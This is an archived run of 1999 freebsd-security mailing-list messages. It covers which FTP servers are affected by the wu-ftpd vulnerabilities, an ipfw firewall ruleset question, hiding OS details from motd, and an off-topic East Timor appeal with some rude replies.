to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- _|_ A jamie rishaw is jamie at arpa dot com .. So what's the speed of dark? "Shyness is nice, but shyness can stop you from doing all the things in life that you'd like to. So, if there's something you'd like to try.. If there's something you'd like to try ask me - I won't say 'no' - how could I?" //Smiths To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 20:31:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from smyk.apk.net (smyk.apk.net [207.54.158.17]) by hub.freebsd.org (Postfix) with ESMTP id 35EF9152F7 for ; Fri, 10 Sep 1999 20:31:27 -0700 (PDT) (envelope-from stuart@apk.net) Received: from junior.apk.net (stuart@junior.apk.net [207.54.158.20]) by smyk.apk.net (8.9.3/8.9.3/apk.990812+rchk1.22+bspm1.13.1.5) with ESMTP id XAA03228; Fri, 10 Sep 1999 23:24:10 -0400 (EDT) Received: from localhost (stuart@localhost) by junior.apk.net (8.9.3/8.9.3) with ESMTP id XAA14575; Fri, 10 Sep 1999 23:24:06 -0400 (EDT) Date: Fri, 10 Sep 1999 23:24:06 -0400 (EDT) From: Stuart Krivis To: Jamie Rishaw Cc: jotajustino@mail.telepac.pt, FreeBSD-security@FreeBSD.ORG Subject: Re: Please don't let Timor people die In-Reply-To: <19990910195513.A12739@rage.arpa.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 10 Sep 1999, Jamie Rishaw wrote: > How do I configure my kernel for this? Recompile with the --use-holy-water option. > > On Sat, Sep 11, 1999 at 12:52:34AM +0000, jotajustino@mail.telepac.pt wrote: > > > > In the referendum promoted by UN 80 % of East Timor people voted for > > Independence. Since then thousands on people have been killed > > JUST FOR THEIR VOTE . Almost all international journalists have been > > forced to leave East Timor ( only four rested ) . > > > > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 > > ( Pacific time ) , leaving the East Timor people ALONE, against those > > who are KILLING them. > > > > In 3 days more than 300.000 people have been forced to move. > > Indonisian policies and militaries have not been able to keep > > peace and have no conditions to maitain peace in East Timor. > > > > United Nations MUST send a Peace Keeping Force to East Timor. > > > > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. > > > > Forward this E-mail or write your own opinion to : > > secretary General of United Nations mailto:ecu@un.org > > president of United States of America > > mailto:president@whitehouse.gov > > > > president of China > > president of French Republic > > British Prime Miniter > > President of Russia > > > > the Pope or your religious leader > > your favorite newsgroup, > > your local senator, > > your favorite newspaper, > > your business partners or friends > > > > Read your favorite site for news about East Timor, or check the > > one of the world leaders http://www.cnn.com > > PS:Thanks, and our apologies for the off topic subject. > > Any coments can be sent to survey1_pt@hotmail.com > > at 15h00 GMT+01h00 Portugal will stop please do your share. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > _|_ > A jamie rishaw is jamie at arpa dot com .. So what's the speed of dark? > > "Shyness is nice, but shyness can stop you from doing all the things in life > that you'd like to. So, if there's something you'd like to try.. If there's > something you'd like to try ask me - I won't say 'no' - how could I?" //Smiths > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Stuart Krivis stuart@krivis.com Fourth law of programming: Anything that can go wrong wi sendmail: segmentation violation - core dumped To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 21:19:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id B1DF914C1F for ; Fri, 10 Sep 1999 21:19:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA55382; Fri, 10 Sep 1999 22:19:21 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA12288; Fri, 10 Sep 1999 22:18:30 -0600 (MDT) Message-Id: <199909110418.WAA12288@harmony.village.org> To: Michael Grommet Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBS D-SA-99:03.ftpd Cc: "'freebsd-security@freebsd.org'" In-reply-to: Your message of "Thu, 09 Sep 1999 08:20:46 CDT." <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> References: <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> Date: Fri, 10 Sep 1999 22:18:30 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> Michael Grommet writes: : Am I correct in my assumtion that this is _not_ exploitable on the standard : ftpd that installs : with freebsd 2.2.8 - 3.2 - Stable? No. You are not correct to assume that. As far as I know, both of the FTP servers are exploitable, for different reasons. Wu-ftpd is exploitable back to the dawn of time, if I read the commentary about wu-ftpd right. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9nYFdxynu/2qPVhAQGOdgP8DuGSKHQAdypnP8IAq4uA3abAG+LeqnvP sS+VjtS49YicY3cIS/1seafX3GnRCzx641ZOaWJIQHS3JCrg0X4smvArCpw+NAHt +NzEqVi4IFkyMlcNsVr1HKZuPr3w4qRRX+qPGfuxjOwLOBTlJ1EpAwxzsuPMZV5k PpO6bcLG8M0= =vRmm -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 21:20:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A99D2153A5 for ; Fri, 10 Sep 1999 21:20:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA55395; Fri, 10 Sep 1999 22:20:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA12313; Fri, 10 Sep 1999 22:19:32 -0600 (MDT) Message-Id: <199909110419.WAA12313@harmony.village.org> To: wdmgds Subject: Re: *bsd crashes/freezes/hangs on local user xploit Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 10 Sep 1999 17:21:27 +0200." References: Date: Fri, 10 Sep 1999 22:19:32 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message wdmgds writes: : compile this code snipplet and wheep ... : it crashed and mutilated our 227 and 3x boxen.. : BSDi4 just freezes a couple of seconds, Short answer: We're working on it. Longer answer: This is a hard bug to fix due to the nature of error handling in the code around it. I'm not involved in fixing it, just keeping track of the progress from time to time. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 21:28:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1A68614C27 for ; Fri, 10 Sep 1999 21:28:21 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id AAA82809; Sat, 11 Sep 1999 00:28:18 -0400 (EDT) (envelope-from wollman) Date: Sat, 11 Sep 1999 00:28:18 -0400 (EDT) From: Garrett Wollman Message-Id: <199909110428.AAA82809@khavrinen.lcs.mit.edu> To: Warner Losh Cc: Michael Grommet , "'freebsd-security@freebsd.org'" Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBS D-SA-99:03.ftpd In-Reply-To: <199909110418.WAA12288@harmony.village.org> References: <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> <199909110418.WAA12288@harmony.village.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > -----BEGIN PGP SIGNED MESSAGE----- > : Am I correct in my assumtion that this is _not_ exploitable on the standard > : ftpd that installs > : with freebsd 2.2.8 - 3.2 - Stable? > No. You are not correct to assume that. As far as I know, both of > the FTP servers are exploitable, for different reasons. Wu-ftpd is > exploitable back to the dawn of time, if I read the commentary about > wu-ftpd right. You mis-read the question. /usr/libexec/ftpd is not vulnerable -- wu-ftpd branched off the Berkeley main-line long before FreeBSD even existed, and the problem `feature' was a wu-ftpd addition. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 21:31:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5490F14C27 for ; Fri, 10 Sep 1999 21:31:56 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA55441; Fri, 10 Sep 1999 22:31:55 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA12612; Fri, 10 Sep 1999 22:31:05 -0600 (MDT) Message-Id: <199909110431.WAA12612@harmony.village.org> To: Garrett Wollman Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBS D-SA-99:03.ftpd Cc: Michael Grommet , "'freebsd-security@freebsd.org'" In-reply-to: Your message of "Sat, 11 Sep 1999 00:28:18 EDT." <199909110428.AAA82809@khavrinen.lcs.mit.edu> References: <199909110428.AAA82809@khavrinen.lcs.mit.edu> <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> <199909110418.WAA12288@harmony.village.org> Date: Fri, 10 Sep 1999 22:31:05 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199909110428.AAA82809@khavrinen.lcs.mit.edu> Garrett Wollman writes: : You mis-read the question. /usr/libexec/ftpd is not vulnerable -- : wu-ftpd branched off the Berkeley main-line long before FreeBSD even : existed, and the problem `feature' was a wu-ftpd addition. I stand corrected. Sorry about that folks. Garrett is right. The stock ftpds on FreeBSD in 2.2.8R and 3.2R are both not impacted by these bugs. They only impact wuftpd, beroftpd (?) and proftpd. I may reissue the ftpd avisory since more security holes in proftpd have come to light and I've had several questions asked about the ftpd advisory that I thought were obvious, but turned out to be hard to get from the text I sent out. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 1:13:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail-gw5.pacbell.net (mail-gw5.pacbell.net [206.13.28.23]) by hub.freebsd.org (Postfix) with ESMTP id E19C214C14 for ; Sat, 11 Sep 1999 01:13:52 -0700 (PDT) (envelope-from dean@thegrid.net) Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net [63.193.246.169]) by mail-gw5.pacbell.net (8.9.3/8.9.3) with SMTP id BAA18599 for ; Sat, 11 Sep 1999 01:13:49 -0700 (PDT) Message-Id: <4.1.19990911010348.00988480@mail.thegrid.net> X-Sender: i393382@mail.thegrid.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sat, 11 Sep 1999 01:13:05 -0700 To: freebsd-security@freebsd.org From: Dean Subject: ipfw passing packets past deny rule? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I am running ipfw/natd on a 486 75MHz. wormhole:/home/king-> uname -a FreeBSD wormhole 3.2-RELEASE FreeBSD 3.2-RELEASE #2: Fri Aug 20 19:54:03 GMT 1999 root@remus.denofslack.net:/usr/src/sys/compile/WORMHOLE i386 I've got a pretty simple ruleset. Today, I saw this in my security check: wormhole denied packets: > 10000 1113 84640 deny log ip from any to any > 65535 1 328 deny ip from any to any This looks to me like one 328 byte packet got by rule 10000. Is this the case? My complete rulest is as follows: 00010 allow ip from any to any via lo0 00020 deny log ip from any to 127.0.0.0/8 00030 divert 8668 ip from any to any via ed0 00080 deny log ip from any to any ipopt ssrr,lsrr 00090 deny log ip from 10.0.0.0/8 to any in recv ed0 00100 allow tcp from any to any established 00200 allow ip from any to any via ed1 00300 allow ip from any to any via ed2 00400 allow ip from any to any out xmit ed0 00500 allow udp from any 53 to any 1024-65535 in recv ed0 00600 allow log tcp from any 1024-65535 to any 113 setup 00700 allow log tcp from any 1024-65535 to 21 setup 00800 allow log tcp from any 1024-65535 to 22 setup 00900 allow log tcp from any 1024-65535 to 23 setup 01100 allow log tcp from any 20 to any 1024-65535 setup 01200 allow udp from 63.192.96.2 123 to 123 in recv ed0 01300 allow udp from any 1024-65535 to 10.0.1.1 1024-65535 01400 allow icmp from any to any icmptype 0,3,4,11,12,14,16,18 01500 allow udp from any 53 to 10.0.1.1 137 in recv ed0 10000 deny log ip from any to any 65535 deny ip from any to any Thank you for your help. If anyone sees any glaring holes in this, please don't be shy. -Dean ------------------------------------------------------------------------------- Staccato signals of constant information. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 2:26:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from kleopatra.acc.umu.se (kleopatra.acc.umu.se [130.239.18.150]) by hub.freebsd.org (Postfix) with ESMTP id BB4CC14C9A for ; Sat, 11 Sep 1999 02:26:38 -0700 (PDT) (envelope-from saska@acc.umu.se) Received: from montezuma.acc.umu.se (saska@montezuma-fddi.acc.umu.se [192.168.18.147]) by kleopatra.acc.umu.se (8.9.3/8.9.3) with ESMTP id LAA25312; Sat, 11 Sep 1999 11:26:36 +0200 Received: (from saska@localhost) by montezuma.acc.umu.se (8.9.3/8.9.3) id LAA15055; Sat, 11 Sep 1999 11:26:35 +0200 (MET DST) Date: Sat, 11 Sep 1999 11:26:35 +0200 From: Markus Holmberg To: Dean Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw passing packets past deny rule? Message-ID: <19990911112634.A15026@montezuma.acc.umu.se> References: <4.1.19990911010348.00988480@mail.thegrid.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: <4.1.19990911010348.00988480@mail.thegrid.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That packet might have slipped through before your bootup scripts had a chance to run /etc/rc.firewall, or during the execution of /etc/rc.firewall.. (before loading rule 10000).. Basically nothing to worry about. Markus -- Markus Holmberg | Give me UNIX or give me a typewriter. saska@acc.umu.se | http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 4:27:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from gti.noc.demon.net (gti.noc.demon.net [195.11.55.101]) by hub.freebsd.org (Postfix) with ESMTP id 399C714DDD; Sat, 11 Sep 1999 04:27:48 -0700 (PDT) (envelope-from pgm@gti.noc.demon.net) Received: (from pgm@localhost) by gti.noc.demon.net (8.8.8/8.8.8) id MAA00229; Sat, 11 Sep 1999 12:27:47 +0100 (BST) From: Patrick MacKeown Message-Id: <199909111127.MAA00229@gti.noc.demon.net> Subject: How to prevent motd including os info To: freebsd-questions@freebsd.org Date: Sat, 11 Sep 1999 12:27:47 +0100 (BST) Cc: freebsd-security@freebsd.org Reply-To: patmac@demon.net X-DNS-Queries-to: Please direct all DNS queries to: hostmaster@demon.net .............. +44-181-371-1000 X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Please would somebody tell me how to prevent motd including the OS version and the kernel name. On my 3.2 box editing the lines out of /etc/motd just leads to them being replaced Patrick Mackeown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 7:43:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id AA23F14E94; Sat, 11 Sep 1999 07:43:44 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from lithium.scientia.demon.co.uk ([192.168.0.3] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.032 #1) id 11Pm2z-000EGI-00; Sat, 11 Sep 1999 13:14:25 +0100 Received: (from ben) by lithium.scientia.demon.co.uk (Exim 3.032 #1) id 11Pm2x-000ASY-00; Sat, 11 Sep 1999 13:14:23 +0100 Date: Sat, 11 Sep 1999 13:14:22 +0100 From: Ben Smithurst To: patmac@demon.net Cc: freebsd-questions@freebsd.org, freebsd-security@freebsd.org Subject: Re: How to prevent motd including os info Message-ID: <19990911131422.A40199@lithium.scientia.demon.co.uk> References: <199909111127.MAA00229@gti.noc.demon.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <199909111127.MAA00229@gti.noc.demon.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Patrick MacKeown wrote: > Please would somebody tell me how to prevent motd including the OS version > and the kernel name. On my 3.2 box editing the lines out of /etc/motd just > leads to them being replaced Set update_motd="NO" in rc.conf, and it will be left alone. -- Ben Smithurst | PGP: 0x99392F7D ben@scientia.demon.co.uk | key available from keyservers and | ben+pgp@scientia.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 9:58:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id 2B11214E1F for ; Sat, 11 Sep 1999 09:58:21 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.3) with ESMTP id JAA12195 for ; Sat, 11 Sep 1999 09:58:21 -0700 (PDT) Message-ID: <199909110958210710.0AC9822F@quaggy.ursine.com> In-Reply-To: <199909110418.WAA12288@harmony.village.org> References: <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> <199909110418.WAA12288@harmony.village.org> X-Mailer: Calypso Version 3.00.00.13 (2) Date: Sat, 11 Sep 1999 09:58:21 -0700 From: "Michael Bryan" To: freebsd-security@freebsd.org Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBS D-SA-99:03.ftpd Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Wu-ftpd is >exploitable back to the dawn of time, if I read the commentary about >wu-ftpd right. I'm fairly certain that wu-ftpd is only exploitable with the VR-serious of patches to 2.4.2, and later with 2.5.0. The stock 2.4.2 wu-ftpd (a little over one year old now) is not exploitable, although the beta versions of 2.4.2 had another exploit that affected them. I don't recall off-hand which branch of wu-ftpd has been included in the FreeBSD ports. The following text is from the wu-ftpd security announcement at ftp://ftp.wu-ftpd.org/pub/wu-ftpd/2.5.0.Security.Update.asc : Versions known to be effected are: wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15 wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17 wu-ftpd-2.5.0 BeroFTPD, all present versions Other derivatives of wu-ftpd may be effected. See the workarrounds (section 3.3) to determine if a derivative is vulnerable. Versions know to be not effected are: NcFTPd, all versions. wu-ftpd-2.4.2 (final, from Academ) All Washington University versions. (Please note: ALL versions of WU-FTPD prior to wu-ftpd-2.4.2-beta-18-vr10 including all WU versions, and all Academ 2.4.1 and 2.4.2 betas, are vulnerable to a remote user root-leveraging attack. See CERT Advisory CA-99-03 'FTP Buffer Overflows' at http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html and section 3.2) Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 10:24:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns0.help-desk.co.uk (ns0.help-desk.co.uk [212.240.170.18]) by hub.freebsd.org (Postfix) with ESMTP id 70F9214CC6; Sat, 11 Sep 1999 10:24:16 -0700 (PDT) (envelope-from root@ns0.help-desk.co.uk) Received: (from root@localhost) by ns0.help-desk.co.uk (8.8.8/8.8.8) id SAA13245; Sat, 11 Sep 1999 18:24:14 +0100 (BST) (envelope-from root) From: Charlie Root aka Patrick Mackeown Root Message-Id: <199909111724.SAA13245@ns0.help-desk.co.uk> Subject: Re: How to prevent motd including os info In-Reply-To: <19990911131422.A40199@lithium.scientia.demon.co.uk> from Ben Smithurst at "Sep 11, 99 01:14:22 pm" To: ben@scientia.demon.co.uk (Ben Smithurst) Date: Sat, 11 Sep 1999 18:24:13 +0100 (BST) Cc: patmac@demon.net, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks to everyone for this answer. patmac > Patrick MacKeown wrote: > > > Please would somebody tell me how to prevent motd including the OS version > > and the kernel name. On my 3.2 box editing the lines out of /etc/motd just > > leads to them being replaced > > Set update_motd="NO" in rc.conf, and it will be left alone. > > -- > Ben Smithurst | PGP: 0x99392F7D > ben@scientia.demon.co.uk | key available from keyservers and > | ben+pgp@scientia.demon.co.uk > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 10:32:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.cybcon.com (mail.cybcon.com [216.190.188.5]) by hub.freebsd.org (Postfix) with ESMTP id 4376814E58 for ; Sat, 11 Sep 1999 10:32:46 -0700 (PDT) (envelope-from wwoods@cybcon.com) Received: from freebsd.cybcon.com (william@usr1-20.cybcon.com [205.147.75.21]) by mail.cybcon.com (8.9.0/8.9.0) with ESMTP id KAA23607; Sat, 11 Sep 1999 10:29:00 -0700 (PDT) Message-ID: X-Mailer: XFMail 1.3.1 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <199909110051.BAA19069@tpone.telepac.pt> Date: Sat, 11 Sep 1999 10:29:10 -0700 (PDT) Reply-To: wwoods@cybcon.com From: William Woods To: jotajustino@mail.telepac.pt Subject: RE: Please don't let Timor people die Cc: FreeBSD-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Fuck off..... On 11-Sep-99 jotajustino@mail.telepac.pt wrote: > > In the referendum promoted by UN 80 % of East Timor people voted for > Independence. Since then thousands on people have been killed > JUST FOR THEIR VOTE . Almost all international journalists have been > forced to leave East Timor ( only four rested ) . > > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 > ( Pacific time ) , leaving the East Timor people ALONE, against those > who are KILLING them. > > In 3 days more than 300.000 people have been forced to move. > Indonisian policies and militaries have not been able to keep > peace and have no conditions to maitain peace in East Timor. > > United Nations MUST send a Peace Keeping Force to East Timor. > > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. > > Forward this E-mail or write your own opinion to : > secretary General of United Nations mailto:ecu@un.org > president of United States of America > mailto:president@whitehouse.gov > > president of China > president of French Republic > British Prime Miniter > President of Russia > > the Pope or your religious leader > your favorite newsgroup, > your local senator, > your favorite newspaper, > your business partners or friends > > Read your favorite site for news about East Timor, or check the > one of the world leaders http://www.cnn.com > PS:Thanks, and our apologies for the off topic subject. > Any coments can be sent to survey1_pt@hotmail.com > at 15h00 GMT+01h00 Portugal will stop please do your share. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ---------------------------------- E-Mail: William Woods Date: 11-Sep-99 Time: 01:05:55 This message was sent by XFMail ---------------------------------- -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GIT d++ s+:+ a C+++ UB+++ P+ L++ E- W++ N+ o+ K- w O- M-- V PS-- PE++ Y+ PGP t+ 5+ X R- tv- b++ DI+ D G e++ h---- r+++ y++++ ------END GEEK CODE BLOCK------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 12: 6:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from loki.iss.net (loki.iss.net [208.21.0.3]) by hub.freebsd.org (Postfix) with ESMTP id 3B43915436 for ; Sat, 11 Sep 1999 12:06:23 -0700 (PDT) (envelope-from rmooney@iss.net) Received: from arden.iss.net (IDENT:rmooney@arden.iss.net [208.21.0.8]) by loki.iss.net (8.9.3/8.9.3) with SMTP id PAA12020; Sat, 11 Sep 1999 15:04:08 -0400 Date: Sat, 11 Sep 1999 15:05:58 -0400 (EDT) From: Robert Mooney To: William Woods Cc: FreeBSD-security@FreeBSD.ORG Subject: RE: Please don't let Timor people die In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Vote William Woods for sole UN representative peace keeping force. On Sat, 11 Sep 1999, William Woods wrote: > Fuck off..... > > On 11-Sep-99 jotajustino@mail.telepac.pt wrote: > > > > In the referendum promoted by UN 80 % of East Timor people voted for > > Independence. Since then thousands on people have been killed > > JUST FOR THEIR VOTE . Almost all international journalists have been > > forced to leave East Timor ( only four rested ) . > > > > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 > > ( Pacific time ) , leaving the East Timor people ALONE, against those > > who are KILLING them. > > > > In 3 days more than 300.000 people have been forced to move. > > Indonisian policies and militaries have not been able to keep > > peace and have no conditions to maitain peace in East Timor. > > > > United Nations MUST send a Peace Keeping Force to East Timor. > > > > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. > > > > Forward this E-mail or write your own opinion to : > > secretary General of United Nations mailto:ecu@un.org > > president of United States of America > > mailto:president@whitehouse.gov > > > > president of China > > president of French Republic > > British Prime Miniter > > President of Russia > > > > the Pope or your religious leader > > your favorite newsgroup, > > your local senator, > > your favorite newspaper, > > your business partners or friends > > > > Read your favorite site for news about East Timor, or check the > > one of the world leaders http://www.cnn.com > > PS:Thanks, and our apologies for the off topic subject. > > Any coments can be sent to survey1_pt@hotmail.com > > at 15h00 GMT+01h00 Portugal will stop please do your share. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > ---------------------------------- > E-Mail: William Woods > Date: 11-Sep-99 > Time: 01:05:55 > This message was sent by XFMail > ---------------------------------- > > -----BEGIN GEEK CODE BLOCK----- > Version: 3.1 > GIT d++ s+:+ a C+++ UB+++ P+ L++ E- W++ N+ o+ K- w > O- M-- V PS-- PE++ Y+ PGP t+ 5+ X R- tv- b++ DI+ D > G e++ h---- r+++ y++++ > ------END GEEK CODE BLOCK------ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 13:13:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.digicomsystems.net (ns1.digicomsystems.net [206.148.67.90]) by hub.freebsd.org (Postfix) with ESMTP id 8BFA614C29; Sat, 11 Sep 1999 13:13:42 -0700 (PDT) (envelope-from jramirez@digicomsystems.net) Received: from engineering (engineering.digicomsystems.net [206.148.67.85]) by ns1.digicomsystems.net (8.9.1/8.9.1) with ESMTP id PAA20023; Sat, 11 Sep 1999 15:14:41 -0500 (CDT) (envelope-from jramirez@digicomsystems.net) Message-Id: <4.2.0.58.19990911151659.00aa8d60@ns1.digicomsystems.net> X-Sender: jramirez@ns1.digicomsystems.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Sat, 11 Sep 1999 15:19:36 -0500 To: dev-null@ns1.digicomsystems.net From: "Jeremy L. Ramirez" Subject: Re: How to prevent motd including os info Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: 